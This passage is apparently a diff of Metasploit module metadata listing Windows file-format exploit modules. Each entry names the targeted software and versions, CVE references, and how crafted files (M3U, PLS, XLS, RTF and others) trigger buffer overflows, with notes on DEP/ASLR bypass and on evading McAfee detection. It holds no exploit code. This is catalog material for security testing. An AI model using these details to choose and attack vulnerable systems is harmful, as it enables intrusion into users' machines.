null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IDEAL Migration <= 4.5.1 on Windows XP", - "IDEAL Administration <= 10.5 on Windows XP" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ideal_migration_ipj.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ideal_migration_ipj", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/iftp_schedule_bof": { - "name": "i-FTP Schedule Buffer Overflow", - "fullname": "exploit/windows/fileformat/iftp_schedule_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-11-06", - "type": "exploit", - "author": [ - "metacom", - "Gabor Seljan" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n i-Ftp v2.20, caused by a long time value set for scheduled download.\n\n By persuading the victim to place a specially-crafted Schedule.xml file\n in the i-FTP folder, a remote attacker could execute arbitrary code on\n the system or cause the application to crash. This module has been\n tested successfully on Windows XP SP3.", - "references": [ - "EDB-35177", - "OSVDB-114279" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/iftp_schedule_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/iftp_schedule_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/irfanview_jpeg2000_bof": { - "name": "Irfanview JPEG2000 jp2 Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/irfanview_jpeg2000_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-16", - "type": "exploit", - "author": [ - "Parvez Anwar ", - "mr_me ", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has\n been tested on a specific version of irfanview (v4.3.2), although other\n versions may work also. The vulnerability is triggered via parsing an\n invalid qcd chunk structure and specifying a malformed qcd size and\n data.\n\n Payload delivery and vulnerability trigger can be executed in multiple\n ways. The user can double click the file, use the file dialog, open via\n the icon and drag/drop the file into Irfanview's window. An egg hunter\n is used for stability.", - "references": [ - "CVE-2012-0897", - "OSVDB-78333", - "BID-51426", - "URL-http://www.greyhathacker.net/?p=525" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Irfanview 4.32 / Plugins 4.32 / Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/irfanview_jpeg2000_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ispvm_xcf_ispxcf": { - "name": "Lattice Semiconductor ispVM System XCF File Handling Overflow", - "fullname": "exploit/windows/fileformat/ispvm_xcf_ispxcf", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-05-16", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in ispVM System 18.0.2. Due to the way\n ispVM handles .xcf files, it is possible to cause a buffer overflow with a specially\n crafted file, when a long value is supplied for the version attribute of the ispXCF\n tag. It results in arbitrary code execution under the context of the user.", - "references": [ - "OSVDB-82000", - "BID-53562", - "URL-http://web.archive.org/web/20121014002756/http://secunia.com/advisories/48740/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ispVM System 18.0.2 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ispvm_xcf_ispxcf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/kingview_kingmess_kvl": { - "name": "KingView Log File Parsing Buffer Overflow", - "fullname": "exploit/windows/fileformat/kingview_kingmess_kvl", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-11-20", - "type": "exploit", - "author": [ - "Lucas Apa", - "Carlos Mario Penagos Hollman", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in KingView <= 6.55. It exists in\n the KingMess.exe application when handling log files, due to the insecure usage of\n sprintf. This module uses a malformed .kvl file which must be opened by the victim\n via the KingMess.exe application, through the 'Browse Log Files' option. The module\n has been tested successfully on KingView 6.52 and KingView 6.53 Free Trial over\n Windows XP SP3.", - "references": [ - "CVE-2012-4711", - "OSVDB-89690", - "BID-57909", - "URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-043-02.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "KingView 6.52 English / KingView 6.53 Free Trial / Kingmess.exe 65.20.2003.10300 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/kingview_kingmess_kvl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/lattice_pac_bof": { - "name": "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow", - "fullname": "exploit/windows/fileformat/lattice_pac_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-05-16", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer\n 6.21. As a .pac file, when supplying a long string of data to the 'value' field\n under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption\n on the stack, which results in arbitrary code execution under the context of the\n user.", - "references": [ - "CVE-2012-2915", - "OSVDB-82001", - "EDB-19006", - "BID-53566", - "URL-http://web.archive.org/web/20120523175252/http://secunia.com:80/advisories/48741" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "PAC-Designer 6.21 on Windows XP SP3" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/lattice_pac_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/lattice_pac_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/lotusnotes_lzh": { - "name": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)", - "fullname": "exploit/windows/fileformat/lotusnotes_lzh", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-05-24", - "type": "exploit", - "author": [ - "binaryhouse.net", - "alino <26alino@gmail.com>" - ], - "description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. This vulnerability was\n discovered binaryhouse.net", - "references": [ - "CVE-2011-1213", - "OSVDB-72706", - "BID-48018", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904", - "URL-http://www.ibm.com/support/docview.wss?uid=swg21500034" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal", - "Lotus Notes 8.5.2 FP2 / Windows Universal / DEP" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/lotusnotes_lzh.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/lotusnotes_lzh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/magix_musikmaker_16_mmm": { - "name": "Magix Musik Maker 16 .mmm Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/magix_musikmaker_16_mmm", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-04-26", - "type": "exploit", - "author": [ - "acidgen", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in Magix Musik Maker 16.\n When opening a specially crafted arrangement file (.mmm) in the application, an\n unsafe strcpy() will allow you to overwrite a SEH handler. This exploit\n bypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and\n might require up to several seconds to receive a shell.", - "references": [ - "OSVDB-72063", - "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-002" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal DEP & ASLR Bypass" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/magix_musikmaker_16_mmm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mcafee_hercules_deletesnapshot": { - "name": "McAfee Remediation Client ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/fileformat/mcafee_hercules_deletesnapshot", - "aliases": [], - "rank": 100, - "disclosure_date": "2008-08-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. When\n sending an overly long string to the DeleteSnapshot() method\n of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code.\n This control is not marked safe for scripting, so choose your attack vector accordingly.", - "references": [ - "OSVDB-94540", - "EDB-16639" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mcafee_hercules_deletesnapshot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mcafee_showreport_exec": { - "name": "McAfee SaaS MyCioScan ShowReport Remote Command Execution", - "fullname": "exploit/windows/fileformat/mcafee_showreport_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-12", - "type": "exploit", - "author": [ - "rgod", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in McAfee Security-as-a-Service.\n The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails\n to check the FileName argument, and passes it on to a ShellExecuteW() function,\n therefore allows any malicious attacker to execute any process that's on the\n local system. However, if the victim machine is connected to a remote share\n (or something similar), then it's also possible to execute arbitrary code.\n Please note that a custom template is required for the payload, because the\n default Metasploit template is detectable by McAfee -- any Windows binary, such\n as calc.exe or notepad.exe, should bypass McAfee fine.", - "references": [ - "OSVDB-78310", - "BID-51397", - "ZDI-12-012" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Internet Explorer" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mcafee_showreport_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mediacoder_m3u": { - "name": "MediaCoder .M3U Buffer Overflow", - "fullname": "exploit/windows/fileformat/mediacoder_m3u", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-24", - "type": "exploit", - "author": [ - "metacom", - "modpr0be ", - "otoy " - ], - "description": "This module exploits a buffer overflow in MediaCoder 0.8.22. The vulnerability\n occurs when adding an .m3u, allowing arbitrary code execution under the context\n of the user. DEP bypass via ROP is supported on Windows 7, since the MediaCoder\n runs with DEP. This module has been tested successfully on MediaCoder 0.8.21.5539\n to 0.8.22.5530 over Windows XP SP3 and Windows 7 SP0.", - "references": [ - "CVE-2017-8869", - "OSVDB-94522", - "EDB-26403" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MediaCoder 0.8.21 - 0.8.22 / Windows XP SP3 / Windows 7 SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mediacoder_m3u.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mediacoder_m3u", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mediajukebox": { - "name": "Media Jukebox 8.0.400 Buffer Overflow (SEH)", - "fullname": "exploit/windows/fileformat/mediajukebox", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-07-01", - "type": "exploit", - "author": [ - "Ron Henry ", - "dijital1" - ], - "description": "This module exploits a stack buffer overflow in Media Jukebox 8.0.400\n by creating a specially crafted m3u or pls file.", - "references": [ - "OSVDB-55924", - "CVE-2009-2650" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 - English", - "Windows XP SP2 - English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mediajukebox.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mediajukebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/microp_mppl": { - "name": "MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/microp_mppl", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-08-23", - "type": "exploit", - "author": [ - "James Fitts " - ], - "description": "This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based\n buffer overflow occurs when the content of a .mppl file gets copied onto the stack,\n which overwrites the lpFileName parameter of a CreateFileA() function, and results\n arbitrary code execution under the context of the user.", - "references": [ - "CVE-2010-5299", - "OSVDB-73627", - "EDB-14720" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / Vista / 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/microp_mppl.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/microp_mppl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/microsoft_windows_contact": { - "name": "Microsoft Windows Contact File Format Arbitary Code Execution", - "fullname": "exploit/windows/fileformat/microsoft_windows_contact", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-01-17", - "type": "exploit", - "author": [ - "John Page (aka hyp3rlinx)", - "Brenner Little" - ], - "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.\n User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of \".contact\" files node param which takes an expected website value, however if an attacker references an\n executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.\n Executable files can live in a sub-directory so when the \".contact\" website link is clicked it traverses directories towards the executable and runs.\n Making matters worse is if the files are compressed then downloaded \"mark of the web\" (MOTW) may potentially not work as expected with certain archive utilitys.\n The \".\\\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.\n This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.", - "references": [ - "EDB-46188", - "URL-http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt", - "ZDI-19-013" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2022-12-04 17:41:24 +0000", - "path": "/modules/exploits/windows/fileformat/microsoft_windows_contact.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/microsoft_windows_contact", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/millenium_mp3_pls": { - "name": "Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/millenium_mp3_pls", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-07-30", - "type": "exploit", - "author": [ - "Molotov", - "dookie", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio.\n This functionality has not been tested in this module.", - "references": [ - "OSVDB-56574", - "EDB-9618", - "EDB-10240" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/millenium_mp3_pls.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/millenium_mp3_pls", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mini_stream_pls_bof": { - "name": "Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/mini_stream_pls_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-07-16", - "type": "exploit", - "author": [ - "Madjix", - "Tiago Henriques", - "James Fitts " - ], - "description": "This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3\n Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim\n opens the malicious PLS file.", - "references": [ - "CVE-2010-5081", - "OSVDB-78078", - "EDB-14373", - "BID-34514" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Mini-stream RM-MP3 Converter v3.1.2.1.2010.03.30" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mini_stream_pls_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mjm_coreplayer2011_s3m": { - "name": "MJM Core Player 2011 .s3m Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/mjm_coreplayer2011_s3m", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-04-30", - "type": "exploit", - "author": [ - "rick2600", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in MJM Core Player 2011\n When opening a malicious s3m file in this application, a stack buffer overflow can be\n triggered, resulting in arbitrary code execution.\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.", - "references": [ - "OSVDB-72101", - "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-004" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal Generic DEP & ASLR Bypass" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mjm_coreplayer2011_s3m", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mjm_quickplayer_s3m": { - "name": "MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/mjm_quickplayer_s3m", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-04-30", - "type": "exploit", - "author": [ - "rick2600", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a\n and QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in\n one of these 2 applications, a stack buffer overflow can be triggered, resulting in\n arbitrary code execution.\n\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.", - "references": [ - "OSVDB-72102", - "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-003" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal Generic DEP & ASLR Bypass" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mjm_quickplayer_s3m", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/moxa_mediadbplayback": { - "name": "MOXA MediaDBPlayback ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/fileformat/moxa_mediadbplayback", - "aliases": [], - "rank": 200, - "disclosure_date": "2010-10-19", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When\n sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-4742", - "OSVDB-68986", - "URL-http://www.moxa.com" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/moxa_mediadbplayback", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mplayer_m3u_bof": { - "name": "MPlayer Lite M3U Buffer Overflow", - "fullname": "exploit/windows/fileformat/mplayer_m3u_bof", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-03-19", - "type": "exploit", - "author": [ - "C4SS!0 and h1ch4m", - "Gabor Seljan" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n MPlayer Lite r33064, caused by improper bounds checking of an URL entry.\n\n By persuading the victim to open a specially-crafted .M3U file, specifically by\n drag-and-dropping it to the player, a remote attacker can execute arbitrary\n code on the system.", - "references": [ - "BID-46926", - "EDB-17013", - "URL-http://www.mplayer-ww.com/eng/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mplayer_m3u_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mplayer_sami_bof": { - "name": "MPlayer SAMI Subtitle File Buffer Overflow", - "fullname": "exploit/windows/fileformat/mplayer_sami_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-05-19", - "type": "exploit", - "author": [ - "Jacques Louw", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow found in the handling\n of SAMI subtitles files in MPlayer SVN Versions before 33471. It currently\n targets SMPlayer 0.6.8, which is distributed with a vulnerable version of MPlayer.\n\n The overflow is triggered when an unsuspecting victim opens a movie file first,\n followed by loading the malicious SAMI subtitles file from the GUI. Or, it can also\n be done from the console with the MPlayer \"-sub\" option.", - "references": [ - "BID-49149", - "OSVDB-74604", - "URL-http://labs.mwrinfosecurity.com/files/Advisories/mwri_mplayer-sami-subtitles_2011-08-12.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "SMPlayer 0.6.8 / mplayer.exe Sherpya-SVN-r29355-4.5.0 / Windows XP English SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mplayer_sami_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mplayer_sami_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms09_067_excel_featheader": { - "name": "MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability", - "fullname": "exploit/windows/fileformat/ms09_067_excel_featheader", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-11-10", - "type": "exploit", - "author": [ - "Sean Larsson", - "jduck " - ], - "description": "This module exploits a vulnerability in the handling of the FEATHEADER record\n by Microsoft Excel. Revisions of Office XP and later prior to the release of the\n MS09-067 bulletin are vulnerable.\n\n When processing a FEATHEADER (Shared Feature) record, Microsoft used a data\n structure from the file to calculate a pointer offset without doing proper\n validation. Attacker supplied data is then used to calculate the location of an\n object, and in turn a virtual function call. This results in arbitrary code\n execution.\n\n NOTE: On some versions of Office, the user will need to dismiss a warning dialog\n prior to the payload executing.", - "references": [ - "CVE-2009-3129", - "OSVDB-59860", - "MSB-MS09-067", - "BID-36945", - "ZDI-09-083", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=832" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office 2002 (XP) SP3 base English on Windows XP SP3 English", - "Microsoft Office 2002 (XP) SP3 w/kb969680 English on Windows XP SP3 English", - "Microsoft Office 2003 SP0 English on Windows XP SP3 English", - "Microsoft Office 2007 SP2 English on Windows XP SP3 English", - "Crash Target for Debugging" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms09_067_excel_featheader", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms10_004_textbytesatom": { - "name": "MS10-004 Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/ms10_004_textbytesatom", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-02-09", - "type": "exploit", - "author": [ - "SkD", - "Snake", - "jduck " - ], - "description": "This module exploits a stack buffer overflow vulnerability in the handling of\n the TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft,\n the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as\n Office 2004 for Mac, are vulnerable.\n\n NOTE: The vulnerable code path is not reachable on versions of Windows prior to\n Windows Vista.", - "references": [ - "CVE-2010-0033", - "OSVDB-62241", - "MSB-MS10-004", - "ZDI-10-017" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft PowerPoint Viewer 2003", - "Microsoft PowerPoint Viewer 2003 (kb949041 or kb956500) or Office 2003 SP3", - "Microsoft PowerPoint Viewer 2003 (kb969615)", - "Crash Target for Debugging" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms10_004_textbytesatom", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms10_038_excel_obj_bof": { - "name": "MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow", - "fullname": "exploit/windows/fileformat/ms10_038_excel_obj_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-06-08", - "type": "exploit", - "author": [ - "Nicolas Joly", - "Shahin Ramezany ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP.\n By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker\n can get the control of the execution flow. This results in arbitrary code execution under\n the context of the user.", - "references": [ - "CVE-2010-0822", - "OSVDB-65236", - "BID-40520", - "MSB-MS10-038", - "URL-https://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office XP) on Windows XP SP3", - "Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms10_038_excel_obj_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms10_087_rtf_pfragments_bof": { - "name": "MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)", - "fullname": "exploit/windows/fileformat/ms10_087_rtf_pfragments_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-11-09", - "type": "exploit", - "author": [ - "wushi of team509", - "unknown", - "jduck ", - "DJ Manila Ice, Vesh, CA" - ], - "description": "This module exploits a stack-based buffer overflow in the handling of the\n 'pFragments' shape property within the Microsoft Word RTF parser. All versions\n of Microsoft Office 2010, 